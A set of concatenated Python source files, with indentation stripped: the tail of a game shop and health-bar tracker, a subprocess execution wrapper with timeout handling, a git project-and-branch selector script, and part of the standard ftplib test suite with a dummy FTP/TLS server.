self.createStageIfNeeded(stage)
return result
def addEntries(self):
while True:
data = self.__entry_queue.get()
stage = data["contents"]["stage"]
if stage == "0-0":
break
timestamp = data["timestamp"]
self.createStageIfNeeded(stage)
if data["mode"] == "shop":
units = data["contents"]["units"]
level = data["contents"]["level"]
gold = data["contents"]["gold"]
self.addShop(stage, units, level, gold, timestamp)
elif data["mode"] == "healthbars":
healthbars = data["contents"]["healthbars"]
self.addHealthbars(stage, healthbars, timestamp)
def addHealthbars(self, stage, healthbars, timestamp):
players = {}
for player, health in healthbars:
matched_player = utils.find_matching_string_in_list(player, self.__players, 70)
if matched_player == "" and player.isdigit():
players[""] = player
players[matched_player] = health
temp_dict = self.__stages[stage].copy()
temp_dict["players"].append(players)
self.__stages[stage] = temp_dict
def addShop(self, stage, units, level, gold, timestamp=0):
"""
Add a shop to the tracker if has yet to be added, along with the current level and gold amount.
:param stage:
:param units: list of un-processed units
:param level:
:param gold:
:param timestamp:
:return: boolean
"""
units = [utils.find_matching_string_in_list(i, self.__unitLookupTable, 75) for i in units]
shop = _create_shop(units, level, gold, timestamp)
temp_dict = self.__stages[stage].copy()
temp_dict["shops"].append(shop)
self.__stages[stage] = temp_dict
def createStageIfNeeded(self, stage):
if stage in self.__stages:
return
self.__stages[stage] = {"shops": [], "players": []}
def _create_shop(units, level, gold, timestamp):
return {"units": units, "level": level, "gold": gold, "timestamp": timestamp}
def initialize_unit_lookup_table():
"""
Initialize the unit lookup table using json file provided from Riot (supports Set2 and Set3)
:return:
"""
unit_lookup_table = []
json = utils.open_json_file("data/champions_set4.json")
for unit in json:
key = "name" # Set 3/4 key
if key not in unit:
key = "champion" # Set 2 key
unit_lookup_table.append(unit[key])
return unit_lookup_table
|
command.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2007-2013, GoodData(R) Corporation. All rights reserved
"""
Module for various command executions
"""
import subprocess
import threading
import os
import psutil
import atexit
import datetime
import logging
import time
lg = logging.getLogger(__name__)
def execute(command, timeout=None, **kwargs):
"""
Execute command, wrapper for Command class
:param command: list for non-shell execution, string for shell execution
:param timeout: timeout in seconds
:param kwargs: keyword arguments to pass to subprocess.Popen
:rtype: tuple (stdout, stderr, retval)
"""
cmd = Command(command, **kwargs)
return cmd.run(timeout)
def signal_ptree(pid, signal=15):
"""
Send signal to whole process tree
By default send SIGTERM (15).
If process doesn't exist, just pass
:param pid: process id
:param signal: signal number, send SIGTERM (15) by default
"""
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
# Process could be already dead, just skip killing children
return
# Get children process tree (psutil 0.4.1 doesn't support recursive=True)
children = get_ptree(process)
lg.info('Sending signal to process tree: signal=%s pid=%s process=%s children=%s' % (signal, process.pid, process.name, len(children)))
if children:
# Children have to be from bottom to top list
for child in children:
try:
lg.info('Sending signal to child process: signal=%s pid=%s process=%s' % (signal, child.pid, child.name))
os.kill(child.pid, signal)
except OSError as e:
if e.errno == 3:
# No such process - it's ok, it could be dead already
lg.debug('Children process does not exist: pid=%s process=%s' % (child.pid, child.name))
continue
# Kill parent
try:
lg.info('Sending signal to parent process: signal=%s pid=%s process=%s' % (signal, process.pid, process.name))
os.kill(process.pid, signal)
except OSError as e:
if e.errno == 3:
# No such process - it's ok, it could die with it's children
lg.debug('Parent process does not exist: pid=%s process=%s' % (process.pid, process.name))
pass
def get_ptree(process):
"""
Get process children recursive.
Used for compatibility with psutil 0.4.1, newer versions supports recursive=True parameter.
Given process isn't included in returned list.
Process tree list is reversed, so first are children from bottom to top.
:param process: psutil.Process instance or uid
:rtype: list (psutil.Process)
"""
if not isinstance(process, psutil.Process):
process = psutil.Process(process)
result = []
children = process.get_children()
if children:
for child in children:
if child.get_children():
result.extend(get_ptree(child))
result.append(child)
else:
result.append(child)
return result
def _proc_cleanup(pid):
"""
Try to cleanup process tree
:param pid: process id
"""
if pid:
try:
process = psutil.Process(pid)
except psutil.NoSuchProcess:
return
signal_ptree(process)
if process.is_running():
# Still running - wait 1 second before sending SIGKILL
time.sleep(1)
signal_ptree(process, 9)
def _register_cleanup(pid):
"""
Register cleanup function for given process id
:param pid: process id
"""
lg.debug("Registering cleanup for pid %s" % pid)
atexit.register(_proc_cleanup, pid)
def _unregister_cleanup(pid):
"""
Unregister cleanup function for given process id
:param pid: process id
"""
lg.debug("Unregistering cleanup for pid %s" % pid)
# Newer atexit has unregister, but we want to be compatible
for handler in atexit._exithandlers:
(func, args, kwargs) = handler
if func == _proc_cleanup and args == (pid,):
atexit._exithandlers.remove(handler)
class Command(object):
"""
Class for command executions
"""
def __init__(self, command, **kwargs):
"""
Initialize instance
:param command: list for non-shell execution, string for shell execution
:param kwargs: keyword arguments to pass to subprocess.Popen
"""
self.command = command
self.process = None
self.stdout = None
self.stderr = None
self.returncode = None
self._exception = None
# Default arguments
popen_args = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'bufsize': 0
}
# We want to pass shell=True argument if we have string command
if isinstance(command, basestring):
popen_args['shell'] = True
# Merge our arguments and supplied ones in kwargs
self.kwargs = dict(popen_args, **kwargs)
def __repr__(self):
"""
Instance name
"""
return '<Command \'%s\'>' % self.command
def run(self, timeout=None, timeout_sigterm=3, timeout_sigkill=5):
"""
Run command with given timeout.
Return tuple of stdout, stderr strings and retval integer.
:param timeout: if command doesn't exit in given timeout, kill the process (default no timeout)
:param timeout_sigterm: wait approximately given seconds after sending SIGTERM before sending SIGKILL (default 3)
:param timeout_sigkill: wait approximately given seconds after sending SIGKILL before considering thread as deadlocked (default 5)
:rtype: tuple (stdout, stderr, retval)
"""
def target():
"""
Thread target function
"""
try:
self.process = subprocess.Popen(self.command, **self.kwargs)
# Register cleanup function to avoid running processes after program exit
_register_cleanup(self.process.pid)
self.stdout, self.stderr = self.process.communicate()
# Remove unwanted leading/trailing whitespaces from output
# Force stdout/stderr to be string if it's empty
self.stdout = self.stdout.strip() if self.stdout else ''
self.stderr = self.stderr.strip() if self.stderr else ''
self.returncode = self.process.returncode
except Exception as e:
self._exception = e
return e
# Run thread with command and wait
thread = threading.Thread(target=target)
lg.debug("Executing command: command='%s' %s"
% (self.command, ' '.join('%s=%s' % (a, b) for a, b in self.kwargs.iteritems())))
time_start = datetime.datetime.now()
thread.start()
if timeout:
thread.join(timeout)
# Thread still alive? Timeout!
if thread.is_alive():
# Terminate process and wait 3 seconds
signal_ptree(self.process.pid)
thread.join(timeout_sigterm)
if thread.is_alive():
# Thread still alive -> send SIGKILL
signal_ptree(self.process.pid, signal=9)
thread.join(timeout_sigkill)
if thread.is_alive():
# Thread still alive -> deadlock
# Unregister cleanup function in case that process would die to avoid killing re-used PID
_unregister_cleanup(self.process.pid)
raise ThreadDeadlock("Process %s deadlocked thread %s" % (self.process.pid, thread.name))
# Process is no running, unregister cleanup and raise Timeout exception
_unregister_cleanup(self.process.pid)
raise ExecutionTimeout("Execution timeout after %s seconds" % timeout)
else:
# No timeout applied.. only insane people should do this.
thread.join()
# Handle exception from thread
if self._exception:
# It means that process is not running, so unregister cleanup and re-raise exception
_unregister_cleanup(self.process.pid)
raise self._exception
lg.debug("Command execution done: time=%s returncode=%s" %
((datetime.datetime.now() - time_start).seconds, self.returncode))
# We are successfully done, unregister cleanup to avoid killing re-used PID uppon server shutdown
_unregister_cleanup(self.process.pid)
return (self.stdout, self.stderr, self.returncode)
## Exceptions
class ExecutionTimeout(Exception):
"""
Raise timeout exception
"""
pass
class ThreadDeadlock(Exception):
"""
Process can't be killed, caused deadlock of executing thread
"""
pass
|
Project_Selector.py
|
#! python3.7
from git import Repo
from threading import Thread
import os
import subprocess
project_dictionary = {}
def get_project_name(project_directory="D:\\Code"):
"""
:param project_directory: Project Directory
Build a dictionary of all projects - consisting of {Project Name : Project Directory Path}
:return: The Full Project Dictionary
"""
return_dictionary = {}
project_names = os.listdir(project_directory)
for name in project_names:
return_dictionary[name] = os.path.join(project_directory, name)
return return_dictionary
def enter_project_name():
"""
No Input params
Get project name from user
:return: the absolute project directory for that project
"""
# function which will take in a project name and direct the system to
# the associated folder
while True:
name_entry = input("Please enter project you wish to work on: ")
try:
return project_dictionary[name_entry]
except KeyError:
list_projects()
def list_projects():
"""
Print a list of all available projects
:return: None
"""
print("Available Projects are: ")
for p in project_dictionary:
print(p)
def checkout_branch():
"""
Search for a list of all branches for a given project
Ask User which branch they want
And check that branch out
:return: None
"""
# function to provide all the available local branches
r = Repo()
repo_heads = r.heads
head_names = [h.name for h in repo_heads]
if len(head_names) == 1:
print(f"Only the {head_names[0]} branch exists - checking it out")
return repo_heads[head_names[0]].checkout()
else:
while True:
print("Available branches are: ")
for h in head_names:
print(h)
branch = input("Enter branch you want to work on: ")
try:
repo_heads[branch].checkout()
break
except KeyError:
print("Invalid Branch - input is case-sensitive")
def ide_opener():
"""
Open the git bash terminal
Check if User wants an IDE open, and open it for them
:return: None
"""
# t = Thread(target=lambda: subprocess.call("D:\\Git\\git-bash.exe"))
# t.start()
loop = True
while loop:
ide_checker = input("Do you want to open an IDE? ")
if ide_checker == 'N':
break
else:
which_ide = input(
"Do you want to open -(A)tom, (P)ycharm or (I)ntellij? or (V)sCode: ")
if which_ide.upper() is not 'A' and not 'P' and not 'I' and not 'V':
print("Please try again")
elif which_ide.upper() == 'A':
os.system("Atom .") # Open Atom to the current Directory
break
elif which_ide.upper() == 'P':
os.system("pycharm .")
break
elif which_ide.upper() == 'V':
os.system("code .")
break
return None
if __name__ == "__main__":
project_dictionary = get_project_name()
if len(project_dictionary) > 1:
list_projects()
else:
project_key = project_dictionary.keys()
print(f"Only Project {project_key} exists")
os.chdir(enter_project_name()) # change directory to project folder
checkout_branch()
ide_opener()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import HOST, HOSTv6
threading = support.import_module('threading')
TIMEOUT = 3
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
